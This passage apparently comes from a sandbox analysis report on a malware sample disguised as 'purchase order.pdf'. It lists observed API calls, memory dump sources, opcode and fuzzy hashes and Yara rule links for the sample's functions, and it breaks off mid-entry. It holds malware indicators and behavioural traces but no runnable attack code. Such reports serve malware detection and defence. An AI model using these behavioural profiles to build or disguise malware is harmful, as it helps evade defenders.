Instruction Fuzzy Hash: 90118971604A029FDB28AF18D451A22B7F4FB88760B14C82EE95ACB3A1DF31E840DB01

Function 00874F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00874D13: FreeLibrary.KERNEL32(00000000,?), ref: 00874D4D

Part of subcall function 0089548B: __wfsopen.LIBCMT ref: 00895496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00874F6F

Part of subcall function 00874CC8: FreeLibrary.KERNEL32(00000000), ref: 00874D02

Part of subcall function 00874DD0: _memmove.LIBCMT ref: 00874E1A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: a0b206e29f36799ca3e488b7f79feeb6cf4289d2ed9702a547f7f58bb25dbc31
Instruction ID: cd5825c6a50e662b73177ae709f3c49151710886a1c180129759387028bf0b34
Opcode Fuzzy Hash: a0b206e29f36799ca3e488b7f79feeb6cf4289d2ed9702a547f7f58bb25dbc31
Instruction Fuzzy Hash: 3411B231600609ABCB15AF78CC02B6E77A5FF41710F10C429F546E6285DFB5DA059BA2

Function 008B01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 008B01BB

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 8c422900b99da009d9e639e39e7c0912186aaf27078b77195ff911a997aa5b98
Instruction ID: 22e6d48168fd348439ab55588649df254ddbe3d7b0f3869ac73f9ef1ce5516a6
Opcode Fuzzy Hash: 8c422900b99da009d9e639e39e7c0912186aaf27078b77195ff911a997aa5b98
Instruction Fuzzy Hash: FD210475508341CFCB18DF64C444A1ABBE1FF84704F088968F99A87761D732E845CB53

Function 008778AD Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008778E9

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 1a51d96c220957c8751305afb485cd3265d56cbbaf2babbddf9e0088ca018fad
Instruction ID: 44d904a9e480742a5e9dd260e4ffe797002815a862c642795b943226e0e92891
Opcode Fuzzy Hash: 1a51d96c220957c8751305afb485cd3265d56cbbaf2babbddf9e0088ca018fad
Instruction Fuzzy Hash: 7E11A572209616ABCB14AB2CD885E7AF799FF45320714812AFD1DC7298DF31EC50C791

Function 00875D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00875807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00875D76

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ddefef4187931f111d56faf569920d7475544f7f86a7498e9941698a7072d12d
Instruction ID: 33aeb334645b1df07603d748aa81a225b404f7bb838f4a55f3b9f764df0d1f18
Opcode Fuzzy Hash: ddefef4187931f111d56faf569920d7475544f7f86a7498e9941698a7072d12d
Instruction Fuzzy Hash: 58112531200B059FE330CF55C888B62BBE9FF45760F10C92EE5AE86A54D7B0E945CB60

Function 00875BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008AE141

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 339d23fea88e41c8f40753fb6b118a973bd571b5e2dac93abf55c7a759e82c5a
Instruction ID: 82b047753743297640e75b2b02d25a6cf9847af3c164fe22f12d28fbc95b093a
Opcode Fuzzy Hash: 339d23fea88e41c8f40753fb6b118a973bd571b5e2dac93abf55c7a759e82c5a
Instruction Fuzzy Hash: FC018FB9604942AFC705EB6DC841D26FBAAFF8A3143148169F819C7702DB71EC21CBE1

Function 00890941 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008909F4

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 630157c8565f8187599ad3f312391ad6a5839fa74ee359386c82b19201c88f56
Instruction ID: d0c9a3bfbe695bf96d74b04ad3a5b37a289a98761ffdc1efda611fa06a08114a
Opcode Fuzzy Hash: 630157c8565f8187599ad3f312391ad6a5839fa74ee359386c82b19201c88f56
Instruction Fuzzy Hash: 18016D72145344CEC7129F64E885AA47BB5FF4321432A11EDE846DF232EB714C41DBA2

Function 00894A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00894AD6

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2fa12aef0b2279b9b14a2bc296c25a70b7f0d151f11fe878de931314be50d9fb
Instruction ID: d8a457739c88969610fdbf59398c34dce6eb12693e7100ddd2ddfcd2e9a61213
Opcode Fuzzy Hash: 2fa12aef0b2279b9b14a2bc296c25a70b7f0d151f11fe878de931314be50d9fb
Instruction Fuzzy Hash: 71F0A431940219DBDF51BF788C06B9E36A1FF01325F1C4514B414EA1D1DB788A52DF52

Function 00874FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,009362F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00874FDE

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 1cf0769e79db37390a814a5db4221288c2d4776ef97af08fa2476da4b5f4c5cf
Instruction ID: 8ee7ae946a15589b5bd29d721410e04be3575c9c23b8de6309b86dc2601cedda
Opcode Fuzzy Hash: 1cf0769e79db37390a814a5db4221288c2d4776ef97af08fa2476da4b5f4c5cf
Instruction Fuzzy Hash: 99F0F271109712CFCB349F64E494822BBE1FF043293259A2EE19A82A19CB32A884DF40

Function 008909D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008909F4

Part of subcall function 00877D2C: _memmove.LIBCMT ref: 00877D66

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 47e89aba96e1c26a6b6d28901594cd2f6d44e29486bafc9bb211f38a2143a46e
Instruction ID: 9d3fe94368c7dcd6a467b1970aab7e2e68785f5bbe9d7ea90ab903e8147cd7f4
Opcode Fuzzy Hash: 47e89aba96e1c26a6b6d28901594cd2f6d44e29486bafc9bb211f38a2143a46e
Instruction Fuzzy Hash: 73E0CD3690422857D720D6AC9C05FFA77EDEF897A0F0441B5FD0CD7209DA749C81C691

Function 008D9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 008D914B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: 1a326dbb9bb63920ca4031b86003d8cae8440ec6cef076de89013ce10f481a7c
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: BBE09AB0214B009FDB398A28D810BE373E0FB06319F00091DF2EAD3342EB62B8418B59

Function 00875DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,008AE16B,?,?,00000000), ref: 00875DBF

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b3f9caf457bbb4ac9a2eea6b5fdc873b45c2516cfa89c6be0fd5b00debdfef2a
Instruction ID: 46819bbcef921f485b27ec3e311e00dccd41180ff3c332beaad035ae9b1077b5
Opcode Fuzzy Hash: b3f9caf457bbb4ac9a2eea6b5fdc873b45c2516cfa89c6be0fd5b00debdfef2a
Instruction Fuzzy Hash: 8CD0C77464020CBFE710DB90DC46FAD777CEB05710F100194FE0456390D6B27D508795

Function 0089548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00895496

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 71219a33e281319f5bc2d2334ac5dd718b39f8abfa067e07a587e949f73c97c9
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 56B092B684020C77DE422E86EC02A593B19AB40678F848020FB0C18162A673A6A0968E

Function 008DD2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 008DD46A

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: ce9626f3cb340d040f85b127a44f0a86c06ddb4b61f66ba6dbe69a5805aac7a3
Instruction ID: 4c2796f60472335cae80e814f974c2a30d0a8085bc420dacfe6a8c7706bebf39
Opcode Fuzzy Hash: ce9626f3cb340d040f85b127a44f0a86c06ddb4b61f66ba6dbe69a5805aac7a3
Instruction Fuzzy Hash: 72713C306047018FC714EF28D491A6AB7E1FF89314F044A6DF99ADB3A2DB70E949CB52

Function 00890E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00890EF7

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: dd65f896ab5aabd08392c9fb45210a8d2f38fe79659765cd37a7a7b7283af85e
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: DB31A071A00109DFCB18EF58D48096DF7A6FF59304B688AA5E90ACB651DB31EEC1DF80

Function 0364229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 036422B1

Memory Dump Source

Source File: 00000000.00000002.1654328107.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3640000_purchase order_pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: ab864b489947b56b1e52ae22e1c95e3d6ae827a6d18ea5f149f07cd6113e0cc1
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 24E0BF7494010EEFDB00EFA8D5496DE7BB4EF04711F1005A1FD05D7680DB309E548A66

Function 036422A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 036422B1

Memory Dump Source

Source File: 00000000.00000002.1654328107.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3640000_purchase order_pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: d7032c8e11e28d9dc22a5fce42d95e827e22d5b8469715c053fd01c374d8ae23
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 5CE0E67494010EDFDB00EFB8D54969E7FB4EF04701F1005A1FD01D2280D6309D508A72

Non-executed Functions

Function 008FCDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00872612: GetWindowLongW.USER32(?,000000EB), ref: 00872623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 008FCE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008FCE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 008FCED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008FCF00
SendMessageW.USER32 ref: 008FCF29
_wcsncpy.LIBCMT ref: 008FCFA1
GetKeyState.USER32(00000011), ref: 008FCFC2
GetKeyState.USER32(00000009), ref: 008FCFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008FCFE5
GetKeyState.USER32(00000010), ref: 008FCFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008FD018
SendMessageW.USER32 ref: 008FD03F
SendMessageW.USER32(?,00001030,?,008FB602), ref: 008FD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 008FD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008FD16E
SetCapture.USER32(?), ref: 008FD177
ClientToScreen.USER32(?,?), ref: 008FD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008FD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008FD203
ReleaseCapture.USER32 ref: 008FD20E
GetCursorPos.USER32(?), ref: 008FD248
ScreenToClient.USER32(?,?), ref: 008FD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 008FD2B1
SendMessageW.USER32 ref: 008FD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 008FD31C
SendMessageW.USER32 ref: 008FD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 008FD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 008FD37B
GetCursorPos.USER32(?), ref: 008FD39B
ScreenToClient.USER32(?,?), ref: 008FD3A8
GetParent.USER32(?), ref: 008FD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 008FD431
SendMessageW.USER32 ref: 008FD462
ClientToScreen.USER32(?,?), ref: 008FD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 008FD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 008FD51A
SendMessageW.USER32 ref: 008FD53D
ClientToScreen.USER32(?,?), ref: 008FD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 008FD5C3

Part of subcall function 008725DB: GetWindowLongW.USER32(?,000000EB), ref: 008725EC

GetWindowLongW.USER32(?,000000F0), ref: 008FD65F

Strings

F, xrefs: 008FD543
@GUI_DRAGID, xrefs: 008FD1AA

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: e6e85cd014f51f0dcfbee74002959fa153e8ab80e0c440ab2985f6f50bf9ae3f
Instruction ID: cde783b1170af46758b8b869a150668eed5cfb45032de2fbf132a68ef20c2034
Opcode Fuzzy Hash: e6e85cd014f51f0dcfbee74002959fa153e8ab80e0c440ab2985f6f50bf9ae3f
Instruction Fuzzy Hash: 19427774208349AFD7218F38C944EBABBE6FF48314F144619F795C72A1DB31A960DB92

Function 008F804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 008F873F

Strings

%d/%02d/%02d, xrefs: 008F8478

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 44dd739f03763d186f97a54b8b0a241e6dcedd3d766627d9da431110d6844aea
Instruction ID: 2d4b2587b1477c1f9e2ee962aa1c265e3c8ca6acb0675ea007ccd2e33fcdfd62
Opcode Fuzzy Hash: 44dd739f03763d186f97a54b8b0a241e6dcedd3d766627d9da431110d6844aea
Instruction Fuzzy Hash: CB129C71500208EBEB259F78CC49FBA7BB8FF49714F244169FA15EA2A1EF749941CB10

Function 0088710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008875C2
_memset.LIBCMT ref: 008876B1
_memmove.LIBCMT ref: 00887C4B
_memmove.LIBCMT ref: 00887E4F

Strings

\b(?=\w), xrefs: 008C3C34
Q\E, xrefs: 008881C1
DEFINE, xrefs: 008C25AF
[:>:]], xrefs: 0088760A
\b(?<=\w), xrefs: 008C3C41
[:<:]], xrefs: 008875F1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: a5bd7240c0f09836dc28bc4447e7283980ae7107bd6a86156bb5d5a5a6cd0cfc
Instruction ID: 66230a6ec7baf108fc48a6bf7c4d8acf8cba3b9d0cb1818bc52cdc37c0ef2bda
Opcode Fuzzy Hash: a5bd7240c0f09836dc28bc4447e7283980ae7107bd6a86156bb5d5a5a6cd0cfc
